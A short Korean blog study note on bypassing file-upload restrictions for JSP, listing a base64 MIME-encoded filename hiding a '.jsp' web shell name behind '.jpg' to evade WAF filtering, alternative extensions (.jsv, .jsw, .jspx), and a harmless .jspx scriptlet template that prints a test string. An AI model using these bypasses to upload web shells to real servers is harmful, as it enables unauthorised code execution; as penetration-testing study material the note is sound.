Notice
Recent Posts
Recent Comments
Link
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
Tags more
Archives
Today
Total
관리 메뉴

JSP 업로드 우회 본문

Study/WEB

JSP 업로드 우회

awakerrday 2020. 9. 1. 19:44

Spring commons-fileupload.jar WAF filtering Bypass

=?UTF8?B?c29tZV93ZWJzaGVsbC5qc3A=?=.jpg

https://ar9ang3.tistory.com/m/56?category=754757

https://enki.co.kr/blog/2020/02/27/cce_writeup.html?fbclid=IwAR0ztC_wshd_DHvIA-HBMh_F99TdqkPiqyGyBu_WfP6Id-2TPTPPp_uPkZY

 

 

- .jsv, .jsw(IBM server)

 

.jspx

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml"
 xmlns:c="http://java.sun.com/jsp/jstl/core" version="2.0">
<jsp:directive.page contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"/>
<jsp:directive.page import="java.util.*"/>
<jsp:directive.page import="java.io.*"/>
<jsp:scriptlet><![CDATA[
<%
	out.println('TEST!!');
%>]]>
</jsp:scriptlet>
</jsp:root>

 

저작자표시 비영리 변경금지

'Study > WEB' 카테고리의 다른 글

Error-based SQLi(Oracle DB)  (0) 2020.09.01
AJAX 요청 방법  (0) 2020.09.01
불충분한 인증/인가  (0) 2020.03.18
SQLi 기록  (0) 2019.07.11
XSS(Cross-Site Scripting) 종류 및 특징  (0) 2019.03.14
'Study/WEB' Related Articles more
Comments